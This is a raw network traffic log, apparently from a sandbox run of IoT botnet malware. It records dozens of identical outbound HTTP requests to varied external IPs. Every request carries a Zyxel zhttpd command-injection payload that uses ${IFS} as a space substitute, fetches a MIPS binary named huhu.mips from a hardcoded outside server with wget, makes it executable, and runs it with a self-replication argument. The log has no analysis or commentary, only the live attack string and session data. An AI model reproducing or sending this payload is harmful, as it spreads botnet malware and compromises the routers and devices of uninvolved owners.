                                                      Feb 2, 2024 06:35:59.770354986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5971192.168.2.144907841.147.180.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770391941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5972192.168.2.1443238209.84.164.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770411015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5973192.168.2.1442488199.43.39.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770467997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5974192.168.2.1439018165.178.83.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770484924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5975192.168.2.1460100186.209.79.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770534039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5976192.168.2.1456814178.200.218.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770566940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5977192.168.2.144705667.216.125.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770593882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5978192.168.2.1433028205.84.207.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770627022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5979192.168.2.143536080.224.251.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770658016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5980192.168.2.1448016221.101.131.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770704031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5981192.168.2.144282694.24.166.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770737886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5982192.168.2.1436502176.81.229.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770776987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5983192.168.2.1458026191.230.239.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770817041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5984192.168.2.1441126217.169.236.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770864964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5985192.168.2.1438314150.43.151.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770880938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5986192.168.2.1448222184.54.148.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770936012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5987192.168.2.1433792203.229.201.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.770973921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5988192.168.2.1441820198.27.80.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771008015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5989192.168.2.143753861.23.121.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771048069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5990192.168.2.1435422130.120.141.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771074057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5991192.168.2.145031440.164.82.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771125078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5992192.168.2.143900034.115.231.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771156073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5993192.168.2.1447712186.77.236.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771205902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5994192.168.2.1443450194.125.124.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771244049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5995192.168.2.1444002172.136.37.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771276951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5996192.168.2.144743443.8.156.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771327019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5997192.168.2.1437028101.173.55.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771362066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5998192.168.2.145287468.28.110.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771415949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5999192.168.2.145679893.27.223.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771440029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6000192.168.2.143437083.132.149.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771493912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6001192.168.2.1438436136.147.24.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771528959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6002192.168.2.1446882145.94.242.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771589994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6003192.168.2.144822065.232.150.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771614075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6004192.168.2.1432992128.84.7.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771661043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6005192.168.2.1434222106.33.255.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771688938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6006192.168.2.144689053.242.30.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771743059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6007192.168.2.145991450.187.169.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771796942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6008192.168.2.1442856190.183.197.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771826029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6009192.168.2.1458710146.241.43.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771874905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6010192.168.2.1445870123.38.8.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771918058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6011192.168.2.1451054132.88.188.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.771945953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6012192.168.2.1448820130.33.40.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772006035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6013192.168.2.143428820.176.171.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772028923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6014192.168.2.1453608117.52.223.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772061110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6015192.168.2.1450836167.170.127.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772094965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6016192.168.2.1450170158.226.85.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772147894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6017192.168.2.1444868220.59.232.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772198915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6018192.168.2.1443796208.108.132.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772212029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6019192.168.2.1447966101.221.236.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772274971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6020192.168.2.1449128136.133.228.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772300005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6021192.168.2.145759666.88.65.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772362947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6022192.168.2.144044618.48.18.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772383928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6023192.168.2.1458314187.131.176.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772414923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6024192.168.2.1446460210.115.188.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772464037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6025192.168.2.1440316163.153.232.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772519112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6026192.168.2.144298470.95.53.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772526979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6027192.168.2.146034237.233.230.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772576094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6028192.168.2.144899823.130.30.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772627115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6029192.168.2.144896432.61.147.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772645950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6030192.168.2.1444166194.216.125.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772702932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6031192.168.2.144192050.173.190.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772722006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6032192.168.2.143709658.224.16.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772751093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6033192.168.2.143732432.122.178.76443
                                                      TimestampBytes transferredDirectionData
